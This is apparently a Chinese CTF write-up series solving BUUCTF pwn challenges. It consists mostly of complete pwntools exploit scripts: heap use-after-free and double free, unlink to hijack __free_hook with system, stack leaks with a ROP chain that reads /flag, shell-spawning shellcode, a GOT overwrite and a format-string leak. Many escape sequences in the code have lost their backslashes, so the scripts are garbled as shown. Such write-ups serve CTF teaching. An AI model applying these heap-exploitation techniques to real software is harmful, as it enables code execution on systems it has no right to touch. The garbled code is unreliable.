BUUCTF-pwn(13)


BUUCTF-pwn(13) wustctf2020_number_game


此时运用我们的计算机底层的知识,可知,计算机底层储存形式为补码!
-2147483648的补码形式为0x80000000,它取反加一之后仍然是0x80000000,因此这边输入-2147483648


护网杯_2018_gettingstart


此时又要用到我们的数学知识!
转换浮点数工具

from pwn import *
context(log_level='debug',os='linux',arch='amd64')

binary = './2018_gettingStart'
r = remote('node4.buuoj.cn',29971)  # challenge instance named in the writeup
elf = ELF(binary)

# 0x18 bytes of filler, then the two 8-byte values the program compares.
# 0x3FB999999999999A is the IEEE-754 double encoding of 0.1 (the writeup
# points at a float-conversion tool for this step); why the binary expects
# exactly these two values is not shown on this page.
payload = b'a'*0x18+p64(0x7FFFFFFFFFFFFFFF)+p64(0x3FB999999999999A)
sleep(0.3)  # small pause before sending; presumably lets the prompt arrive first
r.sendline(payload)
r.interactive()

ciscn_2019_final_2

分析主要函数

Allocate申请函数!

Free释放函数!

Show打印函数!

Exit退出函数!

本题涉及IO,故进行细致分析,大致思路为采用UAF漏洞,打印出libc等低地址,进而计算出偏差,重写低地址,修改fd指向stdin+0x70位置,设置为666,进行输入操作!

Allocate()
Free()
Allocate(2)
Allocate(2)
Allocate(2)
Allocate(2)
Free(2)
Allocate()
Free(2)
heap_low_addr = Show(2)
此时通过连续Free(2)达成tcache的double free,需注意Free之间需要Allocate申请一次,设置bool为1即可释放!

Allocate(2,str(heap_low_addr-0xa0))
Allocate(2,str(heap_low_addr-0xa0))
Allocate(2,str(0x91))

for i in range(7):
[Tab] Free(1)#tcache填充
[Tab] Allocate(2)
Free(1)
main_arena_low = Show(1)-96
stdin_low = (main_arena_low-0x10+(libc.symbols['_IO_2_1_stdin_']-libc.symbols['__malloc_hook']))
此时填充tcache[0x90],并泄露出libc上低4位字节,可以计算出_IO_2_1_stdin_与__malloc_hook的偏移量!

Allocate(1,str(stdin_low+0x70))#对已存在的libc的低地址进行覆写
Allocate()
Free(1)
Allocate(2)
Free(1)
new_heap_addr = Show(1)#泄露出heap上低4位字节
此时重复泄露出heap上的低4位字节,为接下来的修改fd指针作准备!

Allocate(1,str(new_heap_addr-0x30))
Allocate(1,str(new_heap_addr-0x30))
Allocate(1)
Allocate(1,str(666))
此时重新对tcache的fd指针进行布局!重写_fileno(_fileno 返回文件描述符)

由上一系列的流程进而可以得到flag

from pwn import *
context(log_level='debug',os='linux',arch='amd64')

binary = './ciscn_final_2'
r = remote('node4.buuoj.cn',25631)  # remote instance; the process() line below is the local-debug alternative
#r = process(binary)
elf = ELF(binary)
libc = ELF('./libc-2.27.so')  # libc shipped with the challenge (glibc 2.27); symbol offsets below come from it
#libc = ELF('/home/pwn/pwn/glibc-all-in-one/libs/2.27-3ubuntu1_amd64/libc-2.27.so')
def Allocate(choice=1,payload='1n'):
    """Menu command 1: allocate a slot of type *choice* (1 = int, 2 = short int) and send *payload* as its content.

    NOTE(review): the bare "n" inside the prompt literals and the default payload
    looks like a newline escape whose backslash was lost when the page was
    extracted — compare with the binary's real prompts before relying on them.
    """
    dialogue = (
        (r.sendlineafter, "which command?n> ", '1'),
        (r.sendlineafter, "TYPE:n1: intn2: short intn>", str(choice)),
        (r.sendafter, "your inode number:", payload),
    )
    for send, prompt, answer in dialogue:
        send(prompt, answer)

def Free(choice=1):
    """Menu command 2: release the slot of type *choice* (1 = int, 2 = short int)."""
    dialogue = (
        ("which command?n> ", '2'),
        ("TYPE:n1: intn2: short intn>", str(choice)),
    )
    for prompt, answer in dialogue:
        r.sendlineafter(prompt, answer)

def Show(choice=1):
    """Menu command 3: print the slot of type *choice* and return the number it shows.

    The printed value is parsed as decimal and masked to 32 bits for type 1 (int)
    and to 16 bits for any other type (short int), so callers only ever get the
    low bits of whatever the program printed.
    """
    r.sendlineafter("which command?n> ", '3')
    r.sendlineafter("TYPE:n1: intn2: short intn>", str(choice))
    r.recvuntil("number :")
    digits = r.recvuntil('n')[:-1]
    mask = 0xffffffff if choice == 1 else 0xffff
    return int(digits, 10) & mask

def Exit():
    """Menu command 4: leave the program's command loop."""
    command = '4'
    r.sendlineafter("which command?n> ", command)
    

# Exploit sequence for ciscn_final_2 (walkthrough above). Every phase depends on
# the exact allocate/free order, so the statements must stay in this order.
# Show() only returns the low 32/16 bits of an address, hence the "_low" names.

# Phase 1 (writeup): use-after-free on the short-int slot leaks low heap bytes.
Allocate()
Free()
Allocate(2)
Allocate(2)
Allocate(2)
Allocate(2)
Free(2)

Allocate()
Free(2)
heap_low_addr = Show(2)

# Phase 2 (writeup): write heap_low_addr-0xa0 twice, then plant a 0x91 size
# field, so that tcache[0x90] can be filled by the loop below.
Allocate(2,str(heap_low_addr-0xa0))
Allocate(2,str(heap_low_addr-0xa0))
Allocate(2,str(0x91))
for i in range(7):
    Free(1)#tcache fill (writeup: seven entries in tcache[0x90])
    Allocate(2)
Free(1)
#gdb.attach(r)
# Phase 3 (writeup): the leaked low 32 bits point into main_arena; the offset
# between _IO_2_1_stdin_ and __malloc_hook in the matching libc converts them
# into the low bits of stdin.
main_arena_low = Show(1)-96
stdin_low = (main_arena_low-0x10+(libc.symbols['_IO_2_1_stdin_']-libc.symbols['__malloc_hook']))

# Phase 4 (writeup): overwrite the stored low address with stdin+0x70, then
# leak fresh low heap bytes for the final fd rewrite.
Allocate(1,str(stdin_low+0x70))
Allocate()
Free(1)
Allocate(2)
Free(1)
new_heap_addr = Show(1)

# Phase 5 (writeup): re-lay the tcache fd and write 666 into _fileno.
Allocate(1,str(new_heap_addr-0x30))
Allocate(1,str(new_heap_addr-0x30))
Allocate(1)
Allocate(1,str(666))
success(hex(new_heap_addr))
success(hex(main_arena_low))
success(hex(stdin_low))
#gdb.attach(r)
Exit()

r.interactive()

[OGeek2019]bookmanager

函数过程较为复杂,其实较为多,不仔细分析了,使用Unlink手法进行攻击__free_hook,经过多次尝试发现__malloc_hook或__realloc_hook无法获取权限,故对__free_hook进行覆写。
本题难度主要是对函数进行分析.攻击手法难度较低!

位于Edit函数存在堆溢出漏洞!

from unittest.main import main
from pwn import *
context(log_level='debug',os='linux',arch='amd64')

binary = './pwn'
#r = process(binary)
r = remote('node4.buuoj.cn',27418)  # remote instance; the process() line above is the local-debug alternative
elf = ELF(binary)
libc = ELF('./libc-2.23.so')  # libc shipped with the challenge (glibc 2.23); symbol offsets below come from it
#libc = ELF('/home/pwn/pwn/glibc-all-in-one/libs/2.23-0ubuntu3_amd64/libc-2.23.so')
def start():
    """Answer the initial "create: " prompt with the book name 'njh'."""
    book_name = 'njh'
    r.sendlineafter("create: ", book_name)

def Allocate(chapterName='abn'):
    """Menu option 1: add a chapter named *chapterName*.

    NOTE(review): the trailing "n" in the default name (and in the 'n' payload
    defaults of the other helpers) looks like a newline escape whose backslash
    was lost in extraction — confirm before relying on it.
    """
    dialogue = (("Your choice:", '1'), ("Chapter name:", chapterName))
    for prompt, answer in dialogue:
        r.sendlineafter(prompt, answer)

def AllocateSect(chapterName,sectionName):
    """Menu option 2: add section *sectionName* to chapter *chapterName*.

    Returns the hexadecimal value the program prints after "0x" while adding
    the section (the script later uses it as a heap address).
    """
    r.sendlineafter("Your choice:", '2')
    r.sendlineafter("add into:", str(chapterName))
    r.recvuntil("0x")
    line = r.recvline()
    addr = int(line[:-1], 16)  # strip the line terminator, parse the hex digits
    r.sendlineafter("Section name:", str(sectionName))
    return addr

def AllocateText(sectionName,size=0x18,payload='n'):
    """Menu option 3: write *size* bytes of text *payload* into section *sectionName*."""
    dialogue = (
        ("Your choice:", '3'),
        ("add into:", str(sectionName)),
        ("write:", str(size)),
        ("Text:", payload),
    )
    for prompt, answer in dialogue:
        r.sendlineafter(prompt, answer)

def Free(chapterName):
    """Menu option 4: remove the chapter named *chapterName*."""
    dialogue = (("Your choice:", '4'), ("Chapter name:", str(chapterName)))
    for prompt, answer in dialogue:
        r.sendlineafter(prompt, answer)

def FreeSect(sectionName):
    """Menu option 5: remove the section named *sectionName*."""
    dialogue = (("Your choice:", '5'), ("Section name:", str(sectionName)))
    for prompt, answer in dialogue:
        r.sendlineafter(prompt, answer)

def FreeText(sectionName):
    """Menu option 6: remove the text of the section named *sectionName*."""
    dialogue = (("Your choice:", '6'), ("Section name:", str(sectionName)))
    for prompt, answer in dialogue:
        r.sendlineafter(prompt, answer)

def Book():
    """Menu option 7: print the whole book (the caller reads the output)."""
    option = '7'
    r.sendlineafter("Your choice:", option)

def Edit(choice,new,sectionName=''):
    """Menu option 8: rename a chapter (choice 1), a section (choice 2) or rewrite a
    section's text (any other choice, which also needs *sectionName*).

    *new* is sent as the replacement value. The writeup notes the text branch is
    where the program's heap overflow lives.
    """
    r.sendlineafter("Your choice:", '8')
    if choice == 1:
        kind, followups = 'Chapter', (("Chapter name:", new),)
    elif choice == 2:
        kind, followups = 'Section', (("New Section name:", new),)
    else:
        kind, followups = 'Text', (("Section name:", str(sectionName)), ("New Text:", new))
    r.sendlineafter("(Chapter/Section/Text):", kind)
    for prompt, answer in followups:
        r.sendlineafter(prompt, answer)

sectionaddr = []  # never used below; looks like a leftover
start()
# The chapter is named '/bin/sh' so that Free('/bin/sh') at the end hands that
# string to the hijacked free (writeup: __free_hook is overwritten with system).
Allocate('/bin/sh')
target = AllocateSect('/bin/sh','1')+0x20  # address printed by the program, +0x20
AllocateSect('/bin/sh','2')
AllocateSect('/bin/sh','3')

# fd/bk of the fake chunk are chosen relative to target, as the unlink technique
# the writeup names requires.
fd = target-0x18
bk = target-0x10
AllocateText('1',0x88)
AllocateText('2',0x88)
AllocateText('3')
AllocateText('3')
# NOTE(review): b'/bin/shx00' looks like b'/bin/sh\x00' with the backslash lost
# in extraction; the same applies to b'x00' further down.
AllocateText('3',0x18,b'/bin/shx00')

# Heap overflow through Edit (writeup): fake chunk header (size 0x81, fd, bk),
# filler, then presumably the next chunk's prev_size (0x80) and size (0x90).
Edit(3,p64(0)+p64(0x81)+p64(fd)+p64(bk)+12*p64(0)+p64(0x80)+p64(0x90),'1')
FreeText('2')
AllocateText('2',0x70,b'a'*8)
Book()
# Read the 6 pointer bytes that follow the eight 'a's and pad them to 8 bytes;
# 344 is the author's offset from that pointer to main_arena.
r.recvuntil(b'aaaaaaaa')
main_arena = u64(r.recv(6).ljust(8,b'x00'))-344
libc_base = main_arena-0x10-libc.symbols['__malloc_hook']
realloc = libc_base+libc.symbols['__libc_realloc']  # unused below
one = [0x45206,0x4525a,0xef9f4,0xf0897]  # unused below; presumably one-gadget offsets tried before settling on __free_hook (writeup)

# Two edits through the overlapped section: the first presumably redirects the
# text pointer to __free_hook, the second writes system over it.
Edit(3,b'a'*0x18+p64(libc_base+libc.symbols['__free_hook']),'1')
Edit(3,p64(libc_base+libc.symbols['system']),'1')
success(hex(target))
success(hex(main_arena))
#gdb.attach(r)
Free('/bin/sh')

r.interactive()

ciscn_2019_final_4

House of Spirit
该ELF存在反调试,故我们利用ida进行patch!


经过分析主要函数!发现仅仅存在UAF漏洞,不存在其它漏洞,没有Edit编辑函数。
发现采用覆写__malloc_hook的方法失效,故此时我们采用覆写到栈地址上,覆写rip!


本题脚本较大(臃肿),但分步来分析的话相对比较简单!

start()
Allocate(0x88)#0
Allocate()#1
Free(0)
Show(0)
main_arena = u64(r.recvuntil('x7f')[-6:].ljust(8,b'x00'))-88
libc_base = main_arena-0x10-libc.symbols['__malloc_hook']
malloc_hook = libc_base+libc.symbols['__malloc_hook']
realloc = libc_base+libc.symbols['__libc_realloc']
environ_addr = libc_base+libc.symbols['environ']
首先我们通过unsorted bin特性泄露出libc基地址


Allocate(0x88)#2 leak libc
Allocate(0x78)#3
Allocate(0x78)#4
Allocate()#5
Allocate(0x88)#6
Free(3)
Free(4)
Free(3)
Allocate(0x78,p64(note_addr-0x70))#7
Allocate(0x78)#8
Allocate(0x78)#9
Allocate(0x78,p32(0xff)*3+p32(0)*21+p64(environ_addr))#10
Show(0)# leak stack
stack_addr = u64(r.recvuntil(b'x7f')[-6:].ljust(8,b'x00'))-0x210
read_addr = libc_base+libc.symbols['read']
此时我们利用double free漏洞得到bss段上的全局变量的chunk,从而修改全局变量来泄露environ内容得到栈地址!

此时能够泄露出栈地址!
Free(3)
Free(4)
Free(3)
Allocate(0x78,p64(stack_addr))#11
Allocate(0x78)#12
Allocate(0x78)#13
payload = p64(0)+p64(pop_rdi_ret+libc_base)+p64(0)+p64(pop_rsi_ret+libc_base)+p64(stack_addr+0x50)+p64(pop_rdx_ret+libc_base)+p64(0x1000)+p64(read_addr)+b'n'
Allocate(0x78,payload)#14
此时再次利用double free能够申请得到栈上地址,并写入ROP,此时我们覆写malloc_hook为add rsp;ret即可抬升rsp,并且执行ROP,此时我们能往里面进行写入0x1000大小内容,完成orw!


Allocate(0x68)#15
Allocate(0x68)#16
Allocate()#17
Free(15)
Free(16)
Free(15)
Allocate(0x68,p64(malloc_hook-0x23))
Allocate(0x68)
Allocate(0x68)
Allocate(0x68,b'a'*0x13+p64(libc_base+add_rsp48))
r.sendlineafter(">> ",'1')
r.sendlineafter("size?",'10')
flag = stack_addr+0xd8
payload = p64(pop_rdi_ret+libc_base)+p64(0)+p64(pop_rsi_ret+libc_base)+p64(flag)+p64(pop_rdx_ret+libc_base)+p64(0)+p64(libc.symbols['openat']+libc_base)
payload += p64(pop_rdi_ret+libc_base)+p64(3)+p64(pop_rsi_ret+libc_base)+p64(flag)+p64(pop_rdx_ret+libc_base)+p64(0x50)+p64(read_addr)
payload += p64(pop_rdi_ret+libc_base)+p64(flag)+p64(libc.symbols['puts']+libc_base)+b'/flagx00x00x00'
sleep(0.1)
r.send(payload)

此时我们利用该流程,便可以得到flag!

from pwn import *
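context(os='linux',arch='amd64',log_level='debug')

binary = './ciscn_final_4'
r = remote('node4.buuoj.cn',28544)  # remote instance; the process() line below is the local-debug alternative
#r = process(binary)
elf = ELF(binary)
# The machine-specific glibc-all-in-one path used to be loaded first and was
# immediately replaced by the next assignment; ELF() raises when that directory
# is absent, so it is kept as a comment only, matching the other scripts on
# this page.
#libc = ELF('/home/pwn/pwn/glibc-all-in-one/libs/2.23-0ubuntu3_amd64/libc-2.23.so')
libc = ELF('./libc-2.23.so')  # libc shipped with the challenge (glibc 2.23)
# Gadget offsets inside that libc, used for the ROP chain further down. The
# trailing comments appear to be alternative offsets (another build?) — unverified.
pop_rsi_ret = 0x0202e8#0x0202e8
pop_rdi_ret = 0x021102#0x021102
pop_rdx_ret = 0x001b92#0x001b92
add_rsp48 = 0x00c9f81#0x00c9551
note_addr = 0x06020C0  # the program's global note table (writeup: a .bss global)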
def start():
    """Answer the name prompt with the 8-byte value 0x81 followed by b'njh'."""
    name = p64(0x81) + b'njh'
    r.sendlineafter("what is your name? ", name)

def Allocate(size=0x18,payload='n'):
    """Menu option 1: allocate a note of *size* bytes and send *payload* as its content.

    NOTE(review): the default payload 'n' looks like '\\n' with the backslash lost
    in extraction — confirm before relying on it.
    """
    dialogue = (
        (r.sendlineafter, ">> ", '1'),
        (r.sendlineafter, "size?", str(size)),
        (r.sendafter, "content?", payload),
    )
    for send, prompt, answer in dialogue:
        send(prompt, answer)

def Free(index):
    """Menu option 2: release note *index*."""
    dialogue = ((">> ", '2'), ("index ?", str(index)))
    for prompt, answer in dialogue:
        r.sendlineafter(prompt, answer)

def Show(index):
    """Menu option 3: print note *index*; the caller reads the program's output."""
    dialogue = ((">> ", '3'), ("index ?", str(index)))
    for prompt, answer in dialogue:
        r.sendlineafter(prompt, answer)

start()
# Phase 1 (writeup): free a 0x88 note and show it; the unsorted-bin pointer it
# now holds leaks main_arena, from which the libc base is derived.
Allocate(0x88)#0
Allocate()#1
Free(0)
Show(0)
# NOTE(review): 'x7f' and b'x00' look like '\x7f' / b'\x00' with the backslashes
# lost in extraction; the same applies to b'n' and b'/flagx00x00x00' below.
main_arena = u64(r.recvuntil('x7f')[-6:].ljust(8,b'x00'))-88
libc_base = main_arena-0x10-libc.symbols['__malloc_hook']
malloc_hook = libc_base+libc.symbols['__malloc_hook']
realloc = libc_base+libc.symbols['__libc_realloc']  # unused below
environ_addr = libc_base+libc.symbols['environ']

Allocate(0x88)#2 leak libc

Allocate(0x78)#3
Allocate(0x78)#4
Allocate()#5
Allocate(0x88)#6

# Phase 2 (writeup): double free of note 3 to obtain an allocation over the
# global note table, then rewrite that table so Show(0) prints *environ, i.e.
# a stack address.
Free(3)
Free(4)
Free(3)
Allocate(0x78,p64(note_addr-0x70))#7
Allocate(0x78)#8
Allocate(0x78)#9
Allocate(0x78,p32(0xff)*3+p32(0)*21+p64(environ_addr))#10
Show(0)# leak stack
stack_addr = u64(r.recvuntil(b'x7f')[-6:].ljust(8,b'x00'))-0x210  # 0x210: author's offset from the environ value
read_addr = libc_base+libc.symbols['read']

# Phase 3 (writeup): the same double free again to allocate on the stack and
# place a short ROP chain there: read(0, stack_addr+0x50, 0x1000).
Free(3)
Free(4)
Free(3)
Allocate(0x78,p64(stack_addr))#11
Allocate(0x78)#12
Allocate(0x78)#13
payload = p64(0)+p64(pop_rdi_ret+libc_base)+p64(0)+p64(pop_rsi_ret+libc_base)+p64(stack_addr+0x50)+p64(pop_rdx_ret+libc_base)+p64(0x1000)+p64(read_addr)+b'n'
Allocate(0x78,payload)#14

# Phase 4 (writeup): double free on 0x68 notes to reach __malloc_hook-0x23 and
# write the "add rsp; ret" gadget (add_rsp48) over the hook, which lifts rsp
# onto the chain planted in phase 3.
Allocate(0x68)#15
Allocate(0x68)#16
Allocate()#17
Free(15)
Free(16)
Free(15)
Allocate(0x68,p64(malloc_hook-0x23))
Allocate(0x68)
Allocate(0x68)
Allocate(0x68,b'a'*0x13+p64(libc_base+add_rsp48))

success(hex(note_addr))
success(hex(main_arena))
success(hex(environ_addr))
success(hex(stack_addr))
#gdb.attach(r,'b *0x0000000000400B2C')
# Trigger malloc (menu 1) so the hook fires; the phase-3 chain then reads the
# open/read/write payload below onto the stack (writeup: "orw" of /flag).
r.sendlineafter(">> ",'1')
r.sendlineafter("size?",'10')
flag = stack_addr+0xd8  # presumably where the '/flag' string at the end of the payload lands
payload = p64(pop_rdi_ret+libc_base)+p64(0)+p64(pop_rsi_ret+libc_base)+p64(flag)+p64(pop_rdx_ret+libc_base)+p64(0)+p64(libc.symbols['openat']+libc_base)
payload += p64(pop_rdi_ret+libc_base)+p64(3)+p64(pop_rsi_ret+libc_base)+p64(flag)+p64(pop_rdx_ret+libc_base)+p64(0x50)+p64(read_addr)
payload += p64(pop_rdi_ret+libc_base)+p64(flag)+p64(libc.symbols['puts']+libc_base)+b'/flagx00x00x00'
sleep(0.1)
r.send(payload)


r.interactive()

starctf_2019_babyshell

逻辑比较简单!

check函数检测shellcode是否匹配data段上的一串数据,如下

此时我们只要输入的shellcode从其中选择即可!


此时我们选择调整rdi与rdx的值,并且调用syscall进行sys_read,并输入sh执行函数!
或者我们可以利用x00跳出循环比较,从而执行sh函数!如'x00J'+'x00' 或 'x00B3'

from pwn import *
context(log_level='debug',os='linux',arch='amd64')

binary = './starctf_2019_babyshell'
r = remote('node4.buuoj.cn',27400)  # remote instance; the process() line below is the local-debug alternative
#r = process(binary)
elf = ELF(binary)

#gdb.attach(r,'b *0x004008C6')
r.recvuntil("give me shellcode, plz:")
# Stage 1 (writeup): built only from instructions whose bytes pass the check
# against the data-segment table; it adjusts rdx/rdi and issues a syscall so
# the program performs another read.
payload = asm('pop rdx;pop rdx;pop rdx;pop rdx;pop rdx;pop rdx;pop rdx;pop rdx;pop rdx;pop rdi;syscall')
r.send(payload)
sleep(0.1)
# Stage 2: 0xc filler bytes (presumably to land past stage 1) followed by the
# stock pwntools shell payload.
r.send(b'a'*0xc+asm(shellcraft.sh()))

r.interactive()

wustctf2020_easyfast

简单的double

简单的UAF堆题目!

from pwn import *
context(log_level='debug',os='linux',arch='amd64')

binary = './wustctf2020_easyfast'
r = remote('node4.buuoj.cn',26675)  # remote instance; the process() line below is the local-debug alternative
#r = process(binary)
elf = ELF(binary)
# Loaded from a machine-specific path but not used anywhere in this script;
# ELF() raises if that directory is absent.
libc = ELF('/home/pwn/pwn/glibc-all-in-one/libs/2.23-0ubuntu3_amd64/libc-2.23.so')
shell_addr = 0x0602090  # global the sequence below zeroes before calling Shell(); its meaning is not shown here
def Allocate(size=0x18):
    """Menu option 1: allocate a chunk of *size* bytes.

    NOTE(review): the trailing "n" in the prompt literals looks like a newline
    escape whose backslash was lost in extraction — confirm before relying on it.
    """
    dialogue = (("choice>n", '1'), ("size>n", str(size)))
    for prompt, answer in dialogue:
        r.sendlineafter(prompt, answer)

def Free(index):
    """Menu option 2: free chunk *index*."""
    dialogue = (("choice>n", '2'), ("index>n", str(index)))
    for prompt, answer in dialogue:
        r.sendlineafter(prompt, answer)

def Edit(index,payload='n'):
    """Menu option 3: overwrite chunk *index* with *payload* (sent raw, no newline appended)."""
    dialogue = (("choice>n", '3'), ("index>n", str(index)))
    for prompt, answer in dialogue:
        r.sendlineafter(prompt, answer)
    r.send(payload)

def Shell():
    """Menu option 4: the program's shell entry, reached once the global checked by it has been cleared."""
    option = '4'
    r.sendlineafter("choice>n", option)

# UAF (writeup): chunk 0 is edited after being freed, so its fd is pointed at
# shell_addr-0x10; of the next two allocations the second then returns memory
# at that address, and Edit(3, p64(0)) writes 8 zero bytes there (presumably
# clearing the value Shell() checks — confirm in the binary).
Allocate(0x48)#0
Allocate(0x48)#1
Free(0)
Edit(0,p64(shell_addr-0x10))

Allocate(0x48)#2
Allocate(0x48)#3
Edit(3,p64(0))
success(hex(shell_addr))
#gdb.attach(r)
Shell()

r.interactive()

wustctf2020_name_your_dog

存在局限的任意地址写漏洞,较为简单!

经过计算可以修改scanf@got为后门函数地址!

from pwn import *
context(log_level='debug',os='linux',arch='amd64')

binary = './wustctf2020_name_your_dog'
r = remote('node4.buuoj.cn',27072)  # remote instance; the process() line below is the local-debug alternative
#r = process(binary)
elf = ELF(binary)
shell_addr = 0x080485CB  # backdoor function address (writeup); 0x0804xxxx suggests a 32-bit image
dogs = 0x0804A060  # address of the dog-name table (writeup); unused below, the offset -7 is hard-coded

def nameWhich(offset,payload):
    """Select dog slot *offset* (sent as given, so negative values pass through) and send *payload* as its name.

    NOTE(review): the "n" before ">" in the first prompt looks like a newline
    escape whose backslash was lost in extraction — confirm before relying on it.
    """
    dialogue = (("Name for which?n>", str(offset)), ("Give your name plz: ", payload))
    for prompt, answer in dialogue:
        r.sendlineafter(prompt, answer)

# Writeup: the slot index is not bounded below, so index -7 relative to the
# dog table reaches scanf@got, which is overwritten with the backdoor address.
# p64 emits 8 bytes for what looks like a 32-bit address (context arch is
# amd64) — confirm the program tolerates the four extra zero bytes.
nameWhich('-7',p64(shell_addr))

r.interactive()

ciscn_2019_en_3

该文件出现了FORTIFY保护!

本题较为简单,2.27的double free,本意想要采用house of spirit!但是经过实践该方法复杂且无法绕过canary。故还是老老实实采用double free最简单的方式来获取权限!

from pwn import *
context(os='linux',arch='amd64',log_level='debug')

binary = './ciscn_2019_en_3'
r = remote('node4.buuoj.cn',26765)  # remote instance; the process() line below is the local-debug alternative
#r = process(binary)
elf = ELF(binary)
#libc = ELF('/home/pwn/pwn/glibc-all-in-one/libs/2.27-3ubuntu1_amd64/libc-2.27.so')
libc = ELF('./libc-2.27.so')  # libc shipped with the challenge (glibc 2.27); symbol offsets below come from it
def Allocate(size=0x18,payload='n'):
    """Menu option 1: allocate a story of *size* bytes and send *payload* as its content.

    Both the size and the content prompts end in "story: "; they are answered
    in order. NOTE(review): the default payload 'n' looks like '\\n' with the
    backslash lost in extraction — confirm before relying on it.
    """
    dialogue = (
        (r.sendlineafter, "Input your choice:", '1'),
        (r.sendlineafter, "story: ", str(size)),
        (r.sendafter, "story: ", payload),
    )
    for send, prompt, answer in dialogue:
        send(prompt, answer)

def Free(index):
    """Menu option 4: free story *index*."""
    dialogue = (("Input your choice:", '4'), ("Please input the index:", str(index)))
    for prompt, answer in dialogue:
        r.sendlineafter(prompt, answer)


#gdb.attach(r)
# Format-string leak through the name prompt: the two values printed right
# after each '.' are a libc pointer (_IO_file_jumps) and a stack pointer; each
# is read as 12 hex digits after the "0x".
r.sendlineafter("What's your name?",'%p%p%p%p.%p,%p%p%p%p%p%p%p.%p,')
r.recvuntil(".0x")
libc_base = int(r.recv(12),16)-libc.symbols['_IO_file_jumps']
r.recvuntil(".0x")
stack_addr = int(r.recv(12),16)-0x138  # 0x138: author's offset; only printed below
free_hook = libc_base+libc.symbols['__free_hook']
system = libc_base+libc.symbols['system']
success("stack_addr -> "+hex(stack_addr))
success("libc_base -> "+hex(libc_base))
r.sendafter("Please input your ID.",p64(0x71))  # the purpose of 0x71 in the ID field is not explained in the writeup

# glibc 2.27 tcache double free (writeup): story 0 is freed twice, so the first
# two allocations below return the same chunk (the first writes __free_hook
# into it) and the third lands on __free_hook itself, where system is written.
# Free(1) then releases the '/bin/sh' story through the replaced hook.
Allocate()#0
# NOTE(review): b'/bin/shx00' looks like b'/bin/sh\x00' with the backslash lost in extraction.
Allocate(0x18,b'/bin/shx00')#1
Free(0)
Free(0)
Allocate(0x18,p64(free_hook))
Allocate()#2
Allocate(0x18,p64(system))
success(hex(free_hook))
#gdb.attach(r)
Free(1)


r.interactive()
